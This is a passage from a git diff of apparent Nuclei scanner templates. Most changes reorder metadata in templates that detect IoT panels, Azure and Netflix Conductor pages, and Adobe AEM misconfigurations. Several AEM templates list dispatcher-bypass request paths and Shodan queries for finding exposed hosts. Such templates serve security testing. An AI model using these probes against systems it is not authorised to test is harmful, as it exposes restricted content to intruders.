HP Color LaserJet (.+)<\/h1><\/td>' -# digest: 490a0046304402200f946e9f26ce87e308fed44cf7b4ca6ec77672785bdb1610157e7a12ae75118d02202b5461ac88cd30c05cd94068eae230b5342938dfc2d64723c21510a874287ce9:922c64590222798bb761d5b6d8e72950 + +# digest: 490a0046304402200f946e9f26ce87e308fed44cf7b4ca6ec77672785bdb1610157e7a12ae75118d02202b5461ac88cd30c05cd94068eae230b5342938dfc2d64723c21510a874287ce9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/iot/hue-personal-wireless-panel.yaml b/http/iot/hue-personal-wireless-panel.yaml index 428132b177..3b53b4d6c9 100644 --- a/http/iot/hue-personal-wireless-panel.yaml +++ b/http/iot/hue-personal-wireless-panel.yaml @@ -5,15 +5,15 @@ info: author: Hardik-Solanki severity: info description: HUE personal wireless lighting panel was detected. - metadata: - max-request: 1 - shodan-query: title:"hue personal wireless lighting" - product: hue - vendor: philips - tags: hue,iot,wireless - classification: cpe: cpe:2.3:h:philips:hue:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: philips + product: hue + shodan-query: title:"hue personal wireless lighting" + tags: hue,iot,wireless + http: - method: GET path: @@ -31,4 +31,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200ce99a330b051d9b5422b795b8aebf4e359f23b0d128e3291dff6647d18a31ce022100cb28be55fdb18f472419448524da9b7ac273a47bfb378d9a9b2703d2c261e59c:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502200ce99a330b051d9b5422b795b8aebf4e359f23b0d128e3291dff6647d18a31ce022100cb28be55fdb18f472419448524da9b7ac273a47bfb378d9a9b2703d2c261e59c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/iot/loytec-device.yaml b/http/iot/loytec-device.yaml index a5d061a20c..b52e65127c 100644 --- a/http/iot/loytec-device.yaml +++ b/http/iot/loytec-device.yaml @@ -5,16 +5,16 @@ info: author: pussycat0x severity: info description: Loytec Device info panel was detected. + classification: + cpe: cpe:2.3:h:loytec:lvis-3me:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: "loytec" - product: lvis-3me vendor: loytec + product: lvis-3me + shodan-query: "loytec" tags: iot,loytec - classification: - cpe: cpe:2.3:h:loytec:lvis-3me:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +31,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e3d2aed4c3c31c558f094ead6ee0e120da77d623f7951bca70c1e48fc4539e81022100abaaceec70b5e2dc59b778526a16d89eae8661ffe48a96a846279bb83edb62f8:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100e3d2aed4c3c31c558f094ead6ee0e120da77d623f7951bca70c1e48fc4539e81022100abaaceec70b5e2dc59b778526a16d89eae8661ffe48a96a846279bb83edb62f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/iot/zebra-printer-detect.yaml b/http/iot/zebra-printer-detect.yaml index 745b872c91..3ad068096c 100644 --- a/http/iot/zebra-printer-detect.yaml +++ b/http/iot/zebra-printer-detect.yaml @@ -7,16 +7,16 @@ info: description: Zebra Printer panel was detected. reference: - https://www.zebra.com/kr/ko/products/printers.html + classification: + cpe: cpe:2.3:o:zebra:zt220_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"Zebra Technologies" - product: zt220_firmware vendor: zebra + product: zt220_firmware + shodan-query: html:"Zebra Technologies" tags: iot,zebra,printer - classification: - cpe: cpe:2.3:o:zebra:zt220_firmware:*:*:*:*:*:*:*:* http: - method: GET path: @@ -34,4 +34,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206b4bee6bb842af88daf29023d61c1696dd19f32c479e516ca00dad284abbe97a022100eaff461770fad8ee9f38e10b6cf918a85b5e58312662167fb57205f713ecbfcb:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502206b4bee6bb842af88daf29023d61c1696dd19f32c479e516ca00dad284abbe97a022100eaff461770fad8ee9f38e10b6cf918a85b5e58312662167fb57205f713ecbfcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/miscellaneous/exposed-file-upload-form.yaml b/http/miscellaneous/exposed-file-upload-form.yaml index f976c6fdc1..50ce38f689 100644 --- a/http/miscellaneous/exposed-file-upload-form.yaml +++ b/http/miscellaneous/exposed-file-upload-form.yaml @@ -4,16 +4,16 @@ info: name: Exposed File Upload Form author: geeknik severity: info + classification: + cpe: cpe:2.3:a:creativedream_file_uploader_project:creativedream_file_uploader:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.html:"multipart/form-data" html:"file" - product: creativedream_file_uploader vendor: creativedream_file_uploader_project + product: creativedream_file_uploader + shodan-query: http.html:"multipart/form-data" html:"file" tags: miscellaneous,exposure,upload,form,misc,generic - classification: - cpe: cpe:2.3:a:creativedream_file_uploader_project:creativedream_file_uploader:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +33,5 @@ http: - "type=[\"'](file)[\"']" - 'id="file"' condition: or -# digest: 490a0046304402206e7efb13f76fa18665f5ecd860e844ce34e9b8b807437aefa6aa591e53a25fa2022048ca326395148e880ff617e8a94bce723ee32cd0531124508a71e6f8623416c7:922c64590222798bb761d5b6d8e72950 + +# digest: 490a0046304402206e7efb13f76fa18665f5ecd860e844ce34e9b8b807437aefa6aa591e53a25fa2022048ca326395148e880ff617e8a94bce723ee32cd0531124508a71e6f8623416c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/miscellaneous/microsoft-azure-error.yaml b/http/miscellaneous/microsoft-azure-error.yaml index 219bd6ffb4..43385d512c 100644 --- a/http/miscellaneous/microsoft-azure-error.yaml +++ b/http/miscellaneous/microsoft-azure-error.yaml @@ -4,15 +4,15 @@ info: name: Microsoft Azure Web App - Error 404 author: dhiyaneshDK severity: info - metadata: - max-request: 1 - shodan-query: title:"Microsoft Azure Web App - Error 404" - product: azure_app_service_on_azure_stack - vendor: microsoft - tags: error,azure,microsoft,misc,takeover,miscellaneous - classification: cpe: cpe:2.3:a:microsoft:azure_app_service_on_azure_stack:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: microsoft + product: azure_app_service_on_azure_stack + shodan-query: title:"Microsoft Azure Web App - Error 404" + tags: error,azure,microsoft,misc,takeover,miscellaneous + http: - method: GET path: @@ -29,4 +29,5 @@ http: - type: status status: - 404 -# digest: 4a0a0047304502204a9bad4bc12268feabed41f652364c040732e493e45c928b916ddfd8637e7c7e022100ea34fe6ee4b290fe917f08672cdc32c0c9a55c4ffc3a9dc8957c4c22f3444df3:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502204a9bad4bc12268feabed41f652364c040732e493e45c928b916ddfd8637e7c7e022100ea34fe6ee4b290fe917f08672cdc32c0c9a55c4ffc3a9dc8957c4c22f3444df3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/miscellaneous/netflix-conductor-version.yaml b/http/miscellaneous/netflix-conductor-version.yaml index f6460f2500..c2f8e9efb0 100644 --- a/http/miscellaneous/netflix-conductor-version.yaml +++ b/http/miscellaneous/netflix-conductor-version.yaml @@ -8,15 +8,15 @@ info: reference: - https://github.com/Netflix/conductor/blob/v1.6.0-rc1/ui/src/server.js#L17 - https://github.com/Netflix/conductor/blob/v3.1.0/rest/src/main/java/com/netflix/conductor/rest/controllers/AdminResource.java#L42 - metadata: - max-request: 2 - shodan-query: http.title:"Conductor UI", http.title:"Workflow UI" - product: conductor - vendor: netflix - tags: miscellaneous,tech,netflix,conductor,api,misc - classification: cpe: cpe:2.3:a:netflix:conductor:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: netflix + product: conductor + shodan-query: http.title:"Conductor UI", http.title:"Workflow UI" + tags: miscellaneous,tech,netflix,conductor,api,misc + http: - method: GET path: @@ -48,4 +48,5 @@ http: regex: - 'conductor\-server\-([0-9.]+)\-' - '"version":"([0-9.]+)\-' -# digest: 4a0a00473045022100f085f5c985f24b094d4d7e8e9f979b4df02e80f09e2223134899c424905ed62a0220341316f030601c3fa11dd9ddb2788edced8e20970cebd628002903d83af1856e:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100f085f5c985f24b094d4d7e8e9f979b4df02e80f09e2223134899c424905ed62a0220341316f030601c3fa11dd9ddb2788edced8e20970cebd628002903d83af1856e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/aem/aem-acs-common.yaml b/http/misconfiguration/aem/aem-acs-common.yaml index 0d4e51268d..26a876c00c 100644 --- a/http/misconfiguration/aem/aem-acs-common.yaml +++ b/http/misconfiguration/aem/aem-acs-common.yaml @@ -7,17 +7,17 @@ info: description: Adobe AEM ACS Common pages exposed. reference: - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt + classification: + cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:* metadata: max-request: 4 + vendor: adobe + product: acs_aem_commons shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - product: acs_aem_commons - vendor: adobe tags: misconfig,aem,adobe - classification: - cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:* http: - method: GET path: @@ -36,4 +36,5 @@ http: - 'JCR Compare | ACS AEM Commons' - 'Workflow Remover | ACS AEM Commons' condition: or -# digest: 490a00463044022000b0ff7eef39f80727143517276c8c058d1ac932e761c6f97b8b655df992c1b00220288ff39cd43ef4a8660eaeef3dd133a1fc4c1bb204d708ca8d97ac0d260a47e1:922c64590222798bb761d5b6d8e72950 + +# digest: 490a00463044022000b0ff7eef39f80727143517276c8c058d1ac932e761c6f97b8b655df992c1b00220288ff39cd43ef4a8660eaeef3dd133a1fc4c1bb204d708ca8d97ac0d260a47e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/aem/aem-bg-servlet.yaml b/http/misconfiguration/aem/aem-bg-servlet.yaml index 24eafb96c2..f8602b4d62 100644 --- a/http/misconfiguration/aem/aem-bg-servlet.yaml +++ b/http/misconfiguration/aem/aem-bg-servlet.yaml @@ -6,15 +6,15 @@ info: severity: info reference: - https://www.slideshare.net/0ang3el/hunting-for-security-bugs-in-aem-webapps-129262212 - metadata: - max-request: 1 - shodan-query: http.component:"Adobe Experience Manager" - product: experience_manager - vendor: adobe - tags: aem,misconfig - classification: cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: adobe + product: experience_manager + shodan-query: http.component:"Adobe Experience Manager" + tags: aem,misconfig + http: - method: GET path: @@ -30,4 +30,4 @@ http: words: - '
Flushing output
' -# digest: 4a0a00473045022011679f68ea9ea8736dfbf616cd843e2cd2a218f0f4d79653b8e1b3f66e88310a022100e65d71edf92b948507e7fd6c201b5804ca45fc3c262753fe9804347322869acf:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022011679f68ea9ea8736dfbf616cd843e2cd2a218f0f4d79653b8e1b3f66e88310a022100e65d71edf92b948507e7fd6c201b5804ca45fc3c262753fe9804347322869acf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/aem/aem-bulkeditor.yaml b/http/misconfiguration/aem/aem-bulkeditor.yaml index 0b50187c9c..5c6eafc655 100644 --- a/http/misconfiguration/aem/aem-bulkeditor.yaml +++ b/http/misconfiguration/aem/aem-bulkeditor.yaml @@ -6,17 +6,17 @@ info: severity: unknown reference: - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt + classification: + cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: adobe + product: experience_manager shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - product: experience_manager - vendor: adobe tags: misconfig,aem,adobe,editor - classification: - cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +33,4 @@ http: status: - 200 -# digest: 4b0a00483046022100a4edfea1099ebe53ebde4477ff8f5b52cea4088b16cf4b2c8e7d5e54328210da022100c56046c245be3b42415069cccbcd5f1e365e289d7455f3374d6734e94958c4de:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a4edfea1099ebe53ebde4477ff8f5b52cea4088b16cf4b2c8e7d5e54328210da022100c56046c245be3b42415069cccbcd5f1e365e289d7455f3374d6734e94958c4de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/aem/aem-cached-pages.yaml b/http/misconfiguration/aem/aem-cached-pages.yaml index 64ce05b2b7..bcdbb15f46 100644 --- a/http/misconfiguration/aem/aem-cached-pages.yaml +++ b/http/misconfiguration/aem/aem-cached-pages.yaml @@ -7,15 +7,15 @@ info: description: Cached Pages on AEM can be Flushed. reference: - https://twitter.com/AEMSecurity/status/1244965623689609217 - metadata: - max-request: 1 - shodan-query: http.component:"Adobe Experience Manager" - product: experience_manager - vendor: adobe - tags: aem,misconfig - classification: cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: adobe + product: experience_manager + shodan-query: http.component:"Adobe Experience Manager" + tags: aem,misconfig + http: - method: GET path: @@ -35,4 +35,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402202f608d94be30b53e216e833e8a6063f31123faacbf9ea68c704ea9229c2caa6302200485991ab87b6a35c91fce9d0f5e132415cc05c79e05df52f2c910f9b4997dde:922c64590222798bb761d5b6d8e72950 + +# digest: 490a0046304402202f608d94be30b53e216e833e8a6063f31123faacbf9ea68c704ea9229c2caa6302200485991ab87b6a35c91fce9d0f5e132415cc05c79e05df52f2c910f9b4997dde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/aem/aem-crx-bypass.yaml b/http/misconfiguration/aem/aem-crx-bypass.yaml index 9f900ef0fe..9f7fbb8fc0 100644 --- a/http/misconfiguration/aem/aem-crx-bypass.yaml +++ b/http/misconfiguration/aem/aem-crx-bypass.yaml @@ -8,15 +8,15 @@ info: remediation: "Adobe recommends AEM customers review access controls for the CRX package manager path: /etc/packages." reference: - https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/ - metadata: - max-request: 2 - shodan-query: http.component:"Adobe Experience Manager" - product: experience_manager - vendor: adobe - tags: aem,adobe,misconfig - classification: cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: adobe + product: experience_manager + shodan-query: http.component:"Adobe Experience Manager" + tags: aem,adobe,misconfig + http: - raw: - | @@ -49,4 +49,4 @@ http: status: - 200 -# digest: 490a0046304402206a620fb735ebddf2d38e66617f652a1d1f980bfc98b77c0784066538fcc3193c022062a511eed56f5bd9e0eaf2f93bf17a079e6c673676cbae5e2d506e72a96f084c:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206a620fb735ebddf2d38e66617f652a1d1f980bfc98b77c0784066538fcc3193c022062a511eed56f5bd9e0eaf2f93bf17a079e6c673676cbae5e2d506e72a96f084c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/aem/aem-crx-namespace.yaml b/http/misconfiguration/aem/aem-crx-namespace.yaml index d9fbf75aa8..71c8e4cdf8 100644 --- a/http/misconfiguration/aem/aem-crx-namespace.yaml +++ b/http/misconfiguration/aem/aem-crx-namespace.yaml @@ -7,17 +7,17 @@ info: description: Adobe AEM CRX Namespace Editor is exposed. reference: - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt + classification: + cpe: cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: adobe + product: experience_manager_cloud_service shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - product: experience_manager_cloud_service - vendor: adobe tags: exposure,aem,adobe,misconfig - classification: - cpe: cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:* http: - method: GET path: @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f8e1524c8cd8d376fd5c9ad815f96d4dcc1e1f87f1b969b44011cb41b6ef8a4e022100b8d9db03b6373015199145e4f079c1479d6bbb404165ce8e819aa881bc771441:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100f8e1524c8cd8d376fd5c9ad815f96d4dcc1e1f87f1b969b44011cb41b6ef8a4e022100b8d9db03b6373015199145e4f079c1479d6bbb404165ce8e819aa881bc771441:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/aem/aem-crx-search.yaml b/http/misconfiguration/aem/aem-crx-search.yaml index b68be5856f..750e34cb16 100644 --- a/http/misconfiguration/aem/aem-crx-search.yaml +++ b/http/misconfiguration/aem/aem-crx-search.yaml @@ -6,17 +6,17 @@ info: severity: unknown reference: - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt + classification: + cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:* metadata: max-request: 3 + vendor: adobe + product: acs_aem_commons shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - product: acs_aem_commons - vendor: adobe tags: misconfig,aem,adobe,exposure - classification: - cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:* http: - method: GET path: @@ -43,4 +43,4 @@ http: status: - 200 -# digest: 4a0a0047304502210088c8587ec0e4ff18a371d4326689ad944b03512c460f57cdab28bc82917d9478022032adf77e1469f2305dc825a5da6cc6856228cda7c153f1ec96bbc8fd4689b246:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210088c8587ec0e4ff18a371d4326689ad944b03512c460f57cdab28bc82917d9478022032adf77e1469f2305dc825a5da6cc6856228cda7c153f1ec96bbc8fd4689b246:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/aem/aem-custom-script.yaml b/http/misconfiguration/aem/aem-custom-script.yaml index 1eb07f1f72..c3003066df 100644 --- a/http/misconfiguration/aem/aem-custom-script.yaml +++ b/http/misconfiguration/aem/aem-custom-script.yaml @@ -6,17 +6,17 @@ info: severity: unknown reference: - https://www.slideshare.net/0ang3el/hacking-aem-sites + classification: + cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: adobe + product: experience_manager shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - product: experience_manager - vendor: adobe tags: misconfig,aem,adobe - classification: - cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* http: - method: GET path: @@ -52,4 +52,4 @@ http: status: - 200 -# digest: 4b0a0048304602210088f947984063983754727ab3147d3d8579e68e981678f9a1a2a8630c53890331022100834f575fe00ea170bceed8e15bc1afc6e964aff6dc8ecd912122809755b01dd0:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210088f947984063983754727ab3147d3d8579e68e981678f9a1a2a8630c53890331022100834f575fe00ea170bceed8e15bc1afc6e964aff6dc8ecd912122809755b01dd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/aem/aem-debugging-libraries.yaml b/http/misconfiguration/aem/aem-debugging-libraries.yaml index 83da7380f8..3e3f7919d8 100644 --- a/http/misconfiguration/aem/aem-debugging-libraries.yaml +++ b/http/misconfiguration/aem/aem-debugging-libraries.yaml @@ -7,18 +7,18 @@ info: reference: - https://aem4beginner.blogspot.com/debugging-client-libraries - https://adobe-consulting-services.github.io/acs-aem-tools/features/dumplibs/index.html + classification: + cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:* metadata: verified: true max-request: 5 + vendor: adobe + product: acs_aem_commons shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - product: acs_aem_commons - vendor: adobe tags: misconfig,aem,adobe - classification: - cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:* http: - method: GET path: @@ -38,4 +38,4 @@ http: - 'Client Libraries Test Output' condition: or -# digest: 4a0a0047304502200a59b6529343037058eb327f347cbb63dcdc4c7bf942843169ea1b5166a64a430221008e7eb48bb676bbb20424b9e5ed8d12861728d6b2f532d23b2bed93d27ffec773:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200a59b6529343037058eb327f347cbb63dcdc4c7bf942843169ea1b5166a64a430221008e7eb48bb676bbb20424b9e5ed8d12861728d6b2f532d23b2bed93d27ffec773:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/aem/aem-default-get-servlet.yaml b/http/misconfiguration/aem/aem-default-get-servlet.yaml index 8c36f30959..ffb87f4cfa 100644 --- a/http/misconfiguration/aem/aem-default-get-servlet.yaml +++ b/http/misconfiguration/aem/aem-default-get-servlet.yaml @@ -8,19 +8,20 @@ info: reference: - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43 - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/GetServletExposed.java - metadata: - max-request: 64 - shodan-query: http.component:"Adobe Experience Manager" - product: experience_manager - vendor: adobe - tags: aem,adobe,misconfig - classification: cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* + metadata: + max-request: 64 + vendor: adobe + product: experience_manager + shodan-query: http.component:"Adobe Experience Manager" + tags: aem,adobe,misconfig + http: - method: GET path: - "{{BaseURL}}{{paths}}" + payloads: paths: - "/etc" @@ -87,7 +88,6 @@ http: - "///etc.children.json/FNZ.html" - "///etc.children.json/FNZ.png" - "///etc.children.json/FNZ.ico" - stop-at-first-match: true matchers-condition: and @@ -100,4 +100,5 @@ http: words: - 'jcr:createdBy' condition: and -# digest: 490a004630440220104eb07638891f6d6febb6bc9d9b53106368a2ce53208b54d3975a6489f1073e02202a4249f0550aa06ca7d459cc6a9798d7ed77e1d7d7bf98344f3abad59bfb7136:922c64590222798bb761d5b6d8e72950 + +# digest: 490a004630440220104eb07638891f6d6febb6bc9d9b53106368a2ce53208b54d3975a6489f1073e02202a4249f0550aa06ca7d459cc6a9798d7ed77e1d7d7bf98344f3abad59bfb7136:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/aem/aem-disk-usage.yaml b/http/misconfiguration/aem/aem-disk-usage.yaml index f723a98e03..63b473bb62 100644 --- a/http/misconfiguration/aem/aem-disk-usage.yaml +++ b/http/misconfiguration/aem/aem-disk-usage.yaml @@ -7,17 +7,17 @@ info: description: Adobe AEM Disk Usage Information is exposed. reference: - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt + classification: + cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: adobe + product: acs_aem_commons shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - product: acs_aem_commons - vendor: adobe tags: misconfig,aem,adobe,exposure - classification: - cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:* http: - method: GET path: @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402200555d5af56a7d2de9bf494904b6f84c28e8ca424ac008d59a06f50719835cf2002200be1973e4a0aa606b3ebec95d4d3bdc6da658c0655f494dfa8a323e9ee1a906b:922c64590222798bb761d5b6d8e72950 + +# digest: 490a0046304402200555d5af56a7d2de9bf494904b6f84c28e8ca424ac008d59a06f50719835cf2002200be1973e4a0aa606b3ebec95d4d3bdc6da658c0655f494dfa8a323e9ee1a906b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/aem/aem-dump-contentnode.yaml b/http/misconfiguration/aem/aem-dump-contentnode.yaml index d99d6019b3..dbc3b682b4 100644 --- a/http/misconfiguration/aem/aem-dump-contentnode.yaml +++ b/http/misconfiguration/aem/aem-dump-contentnode.yaml @@ -7,17 +7,17 @@ info: description: Node Properties are exposed in AEM Dump. reference: - https://www.slideshare.net/0ang3el/hacking-aem-sites + classification: + cpe: cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: adobe + product: experience_manager_cloud_service shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - product: experience_manager_cloud_service - vendor: adobe tags: misconfig,aem,adobe - classification: - cpe: cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:* http: - method: GET path: @@ -50,4 +50,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205d5bbe6ac19b50e900240a42f9d473d8905559b3f12249733d26aa4f7ab21f52022100d2ab3e983576ee3f9604a02809dd75ecfc1c6f7302a4148f74e422867f3b7f7c:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502205d5bbe6ac19b50e900240a42f9d473d8905559b3f12249733d26aa4f7ab21f52022100d2ab3e983576ee3f9604a02809dd75ecfc1c6f7302a4148f74e422867f3b7f7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/aem/aem-explorer-nodetypes.yaml b/http/misconfiguration/aem/aem-explorer-nodetypes.yaml index e3e9c7f466..3380c57adb 100644 --- a/http/misconfiguration/aem/aem-explorer-nodetypes.yaml +++ b/http/misconfiguration/aem/aem-explorer-nodetypes.yaml @@ -7,17 +7,17 @@ info: description: Adobe AEM Explorer NodeTypes is exposed. reference: - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt + classification: + cpe: cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: adobe + product: experience_manager_cloud_service shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - product: experience_manager_cloud_service - vendor: adobe tags: misconfig,aem,adobe,exposure - classification: - cpe: cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:* http: - method: GET path: @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210085e3be40289ff9dc95a53020c7f95e91deb14adb8d3dd368350d97076f0bf66702201e55b0378eb0d3c1cf7c0c38ceca8d15ad3ed8519322096d49105cc7c4b08002:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502210085e3be40289ff9dc95a53020c7f95e91deb14adb8d3dd368350d97076f0bf66702201e55b0378eb0d3c1cf7c0c38ceca8d15ad3ed8519322096d49105cc7c4b08002:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/aem/aem-external-link-checker.yaml b/http/misconfiguration/aem/aem-external-link-checker.yaml index 2cb06f60b4..5db9739532 100644 --- a/http/misconfiguration/aem/aem-external-link-checker.yaml +++ b/http/misconfiguration/aem/aem-external-link-checker.yaml @@ -6,17 +6,17 @@ info: severity: unknown reference: - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt + classification: + cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: adobe + product: acs_aem_commons shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" - product: acs_aem_commons - vendor: adobe tags: misconfig,aem,adobe,exposure - classification: - cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:* http: - method: GET path: @@ -40,4 +40,4 @@ http: status: - 200 -# digest: 4b0a00483046022100e2bd723809b927a6801ac5b2583744d0ef36351561ccdb9128651aba345cc71f022100836c8d37a31041790cdec829f3de78fb60230d146378d19a8551015b18b04286:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e2bd723809b927a6801ac5b2583744d0ef36351561ccdb9128651aba345cc71f022100836c8d37a31041790cdec829f3de78fb60230d146378d19a8551015b18b04286:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/aem/aem-gql-servlet.yaml b/http/misconfiguration/aem/aem-gql-servlet.yaml index f50157572d..36465ae495 100644 --- a/http/misconfiguration/aem/aem-gql-servlet.yaml +++ b/http/misconfiguration/aem/aem-gql-servlet.yaml @@ -7,19 +7,20 @@ info: description: AEM GQLServlet is exposed. reference: - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/reference-materials/javadoc/index.html?org/apache/jackrabbit/commons/query/GQL.html - metadata: - max-request: 29 - shodan-query: http.component:"Adobe Experience Manager" - product: experience_manager - vendor: adobe - tags: aem,misconfig - classification: cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* + metadata: + max-request: 29 + vendor: adobe + product: experience_manager + shodan-query: http.component:"Adobe Experience Manager" + tags: aem,misconfig + http: - method: GET path: - "{{BaseURL}}{{paths}}" + payloads: paths: - "/bin/wcm/search/gql.json?query=type:User%20limit:..1&pathPrefix=&p.ico" @@ -51,7 +52,6 @@ http: - "///bin///wcm///search///gql.json///a.png?query=type:base%20limit:..1&pathPrefix=" - "///bin///wcm///search///gql.json///a.js?query=type:base%20limit:..1&pathPrefix=" - "///bin///wcm///search///gql.json///a.html?query=type:base%20limit:..1&pathPrefix=" - stop-at-first-match: true matchers-condition: and @@ -66,4 +66,5 @@ http: - 'path' - 'hits' condition: and -# digest: 490a0046304402206193866bf0dd434662189198c5055f732162d34385c7367eeb2ae0e01bfa7c280220313b031c5d09c5ee1b46c97a0f6030379d2964a722e2c6765a265e3232d6cd87:922c64590222798bb761d5b6d8e72950 + +# digest: 